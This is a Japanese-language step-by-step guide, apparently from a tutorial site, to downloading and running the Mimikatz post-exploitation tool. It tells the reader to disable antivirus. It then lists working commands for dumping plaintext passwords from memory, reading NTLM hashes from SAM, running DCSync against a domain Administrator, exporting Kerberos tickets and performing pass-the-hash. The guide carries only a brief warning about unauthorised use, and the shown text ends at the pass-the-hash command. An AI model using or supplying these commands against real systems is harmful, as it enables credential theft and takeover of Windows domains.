はじめに

Mimikatzは、メモリから平文のパスワード、ハッシュ、PINコード、Kerberosチケットを抽出するために設計された強力なポストエクスプロイトツールです。これは、システムの脆弱性を評価するためにペネトレーションテスターやセキュリティ専門家によって広く使用されています。このガイドでは、倫理的なセキュリティテストのためにMimikatzをインストールして使用するためのステップバイステップのアプローチを提供します。

警告: Mimikatzの無許可使用は違法です。使用する前に、必ず許可を得てください。

前提条件

Mimikatzをインストールする前に、以下のものを確認してください:

  • Windowsマシン(Windows 7、10、11、またはサーバーバージョン)
  • 管理者権限
  • Windows Defenderおよび任意のアンチウイルスソフトウェアを無効にする(Mimikatzはしばしばマルウェアとしてフラグされます)

Mimikatzのダウンロード

MimikatzはGitHubで入手可能なオープンソースツールです。ダウンロードするには:

  1. ウェブブラウザを開き、https://github.com/gentilkiwi/mimikatzにアクセスします。
  2. Code > Download ZIPをクリックします。
  3. ZIPファイルを任意のフォルダーに抽出します。

または、Gitを使用してリポジトリをクローンすることもできます:

 git clone https://github.com/gentilkiwi/mimikatz.git

Mimikatzの実行

Mimikatzは管理者権限を必要とするため、以下の手順に従って実行します:

  1. コマンドプロンプトまたはPowerShellを管理者として開きます。
  2. Mimikatzを抽出したフォルダーに移動します:
    cd pathtomimikatzx64
  3. Mimikatzを実行します:
    mimikatz.exe
  4. mimikatz #プロンプトのあるコマンドラインインターフェイスが表示されるはずです。

基本的なMimikatzコマンド

1. システム権限の確認

資格情報を抽出する前に、十分な権限があることを確認します:

privilege::debug

成功した場合、次のように表示されるはずです:Privilege '20' OK

2. メモリからのパスワードの抽出

メモリから平文のパスワードをダンプするには、次のコマンドを使用します:

sekurlsa::logonpasswords

これにより、利用可能な場合、ユーザー名、ドメイン、および平文のパスワードが表示されます。

3. NTLMハッシュのダンプ

NTLMハッシュはパス・ザ・ハッシュ攻撃に使用できます。抽出するには、次のコマンドを実行します:

lsadump::sam

または、リモートシステムの場合:

lsadump::dcsync /domain:targetdomain.com /user:Administrator

4. Kerberosチケットの抽出

システムからKerberosチケットを取得するには:

sekurlsa::tickets /export

これにより、パス・ザ・チケット攻撃に使用できる.kirbiファイルがエクスポートされます。

5. パス・ザ・ハッシュ攻撃

パスワードの代わりにNTLMハッシュで認証するには:

sekurlsa::pth /user:Administrator /domain:example.com /ntlm:<hash>